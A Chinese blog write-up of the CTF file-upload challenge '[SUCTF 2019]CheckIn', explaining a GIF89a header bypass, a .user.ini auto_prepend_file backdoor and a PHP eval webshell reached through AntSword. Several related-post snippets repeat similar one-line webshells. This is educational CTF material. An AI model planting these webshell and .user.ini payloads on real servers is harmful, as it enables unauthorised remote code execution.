BUU实战笔记——[SUCTF 2019]CheckIn 1

于 2023-07-14 16:12:58 发布
阅读量170 收藏
点赞数
分类专栏: CTF 文章标签: 笔记 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51175992/article/details/131726113
版权

题型:[SUCTF 2019]CheckIn 1

类型:文件上传

一、测试

先上传.php以及.phtml文件,发现存在报错的现象,上传.jpg文件发现可以,这个地方有一个小知识点,有些题会设置exif_imagetype函数,就像这题。所以需要构建头字节,在代码之前加一个
GIF89a?,所以最好习惯性在一句话木马前加这个文件头

在上传之后还是无法被解析,这就需要利用配置文件

二、构建配置文件

还是两步走!
第一步:构造.user.ini
这里采用全局配置文件.user.ini(用于nginx服务器)
其中有两个配置,可以用来制造后门:
auto_append_file、auto_prepend_file
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=test.jpg

或者

auto_append_file=test.jpg

因此这里构建的payload为

GIF89a
auto_prepend_file=sad.jpg

上传成功!

2023-07-14T07:52:42.png

第二步:上传图片马
payloade为

GIF89a?
<script language="php">
@eval($_POST['cmd']);phpinfo();
</script>

2023-07-14T07:58:50.png

上传成功!
看看可以可以访问吗
 

2023-07-14T07:59:48.png


OK,基本上成功了

三、利用蚁剑连接

在根目录下找到FLAG

2023-07-14T08:00:35.png

总结

其实文件上传的题的思路都一样,关键是能分析出来是什么进行了过滤,说白了就是找特征!

muzzert
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[SUCTF 2019]CheckIn1
biggerpig的博客
09-29 1742
[SUCTF 2019]CheckIn1
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 221
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn 1
m0_73728268的博客
03-23 140
1.函数1exif_imagetype()函数 2.图片🐎的制作 3.user.ini配置文件
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 675
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1409
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1486
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 408
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
BUUCTF-CheckIn
m0_47571887的博客
11-09 765
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
BUU刷题--[GKCTF2020]CheckIN [网鼎杯 2020 朱雀组]phpweb
weixin_48631429的博客
12-02 376
[GKCTF2020]CheckIN 打开题目: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2749
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
【学习笔记 26】 buu [SUCTF 2019]CheckIn
weixin_43553654的博客
07-27 298
0x00 知识点 利用.user.ini文件的文件上传 利用利用GIF89a文件头绕过exif_imagetype()的检测。 0x01 知识点讲解 什么是.user.ini文件? 答:.user.ini文件相当于一个用户可以自定义的php.ini文件,但是有一点限制就是不能定义PHP_INI_SYSTEM模式,而在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。 怎么利用.user.ini文件? 答:我们可以在.user.ini文件中写入auto_prepen
BUUCTF_web_checkln
vegetable_haker的博客
10-11 802
BUUCTF_web_checkln方法步骤 方法 利用.user.ini隐藏后门。配置项auto_prepend_file 会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门 步骤 1.新建文件.user.ini,写入 GIF89a //绕过exif_imagetype() auto_prepend_file=test.jpg...
BUUCTF__[SUCTF 2019]CheckIn_题解
风过江南乱的博客
05-22 1429
一、前言 最近有点烦,感觉自己什么都不会。估计是在家待的太久了,浪费了很多时间。 这学期不开学了,真烦,被网课折磨,这都快期末了。 二、看题 一个文件上传的题目,而且给了源码,但可能没有也能做。 不过我看wp都看的很懵。 先尝试上传一张正常的图片,回显了文件目录 再尝试上传php一句话木马。提示非法后缀 <?php @eval($_POST['post']) ?> 再尝试改一下文件后缀,提示有 <? 应该是黑名单过滤。 所以尝试用 <script language="
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值